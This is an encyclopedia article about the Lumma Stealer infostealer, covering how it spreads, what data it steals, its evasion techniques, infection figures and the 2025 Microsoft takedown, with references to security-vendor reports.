Lumma Stealer

From HandWiki
Short description: Malware for Microsoft Windows

Template:Infobox malware

Lumma Stealer is an infostealer malware as a service program developed for Microsoft Windows.

Technical overview

Lumma Stealer is distributed by affiliates via a number of campaigns including phishing emails, malicious advertisements posing as legitimate downloads, and compromised websites. It is frequently associated with fake CAPTCHA pages, which prompt the user to paste a command into the run box.[1] It steals data from a number of programs including web browsers, crypto wallets and chat applications, as well as user files.[2] The exfiltrated data is sent to a number of hardcoded control servers, falling back to Telegram, Dropbox and Steam if the servers are unreachable.[3]

Lumma Stealer employs advanced obfuscation techniques, and uses process hollowing to impersonate legitimate programs for the purposes of evading detection. It delays detonation until a sufficient amount of human-like activity has occurred.[4] Instead of using WinAPI, it performs direct syscalls.[5]

History

Lumma is believed to have first originated on cybercrime forums in 2022.[6]

From March to May 2025, Microsoft identified 394,000 computers that were infected with Lumma.[7] In 2025, Lumma was the second most common sample uploaded to ANY.RUN, and the third on MalwareBazaar.[8][9] In May 2025, Microsoft announced the seizure of 2,300 domains associated with Lumma through a vulnerability.[10] While Lumma has continued their operation, it was believed that this may have damaged their reputation.[11] Between June to July, the activity associated with Lumma rebounded.[12]

References

  1. "Behind the CAPTCHA: A Clever Gateway of Malware". https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/. 
  2. "Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer" (in en-US). 2025-05-21. https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/. 
  3. Team, Cybereason Security Services. "Your Data Is Under New Lummanagement: The Rise of LummaStealer" (in en). https://www.cybereason.com/blog/threat-analysis-rise-of-lummastealer. 
  4. akerr (2023-11-20). "Analyzing LummaC2 stealer’s novel Anti-Sandbox technique: Leveraging trigonometry for human behavior detection" (in en-US). https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/. 
  5. "A Deep Dive Into Malicious Direct Syscall Detection" (in en-US). 2024-02-13. https://www.paloaltonetworks.com/blog/security-operations/a-deep-dive-into-malicious-direct-syscall-detection/. 
  6. "Lumma Stealer Is Out… of Business!" (in en). https://www.bitsight.com/blog/lumma-stealer-is-out-of-business. 
  7. Masada, Steven (2025-05-21). "Disrupting Lumma Stealer: Microsoft leads global action against favored cybercrime tool" (in en-US). https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/. 
  8. "Malware Trends Tracker | ANY.RUN" (in en). https://any.run/malware-trends/. 
  9. "The Spamhaus Project" (in en). https://www.spamhaus.org/malware-digest/#malwarebazaar. 
  10. Masada, Steven (2025-05-21). "Disrupting Lumma Stealer: Microsoft leads global action against favored cybercrime tool" (in en-US). https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/. 
  11. "LummaC2 Fractures as Acreed Malware Becomes Top Dog" (in en). https://www.darkreading.com/remote-workforce/lummac2-fractures-acreed-malware-top-dog. 
  12. "Back to Business: Lumma Stealer Returns with Stealthier Methods" (in en-US). 2025-07-22. https://www.trendmicro.com/en_us/research/25/g/lumma-stealer-returns.html. 



Retrieved from "https://handwiki.org/wiki/index.php?title=Lumma_Stealer&oldid=3987263"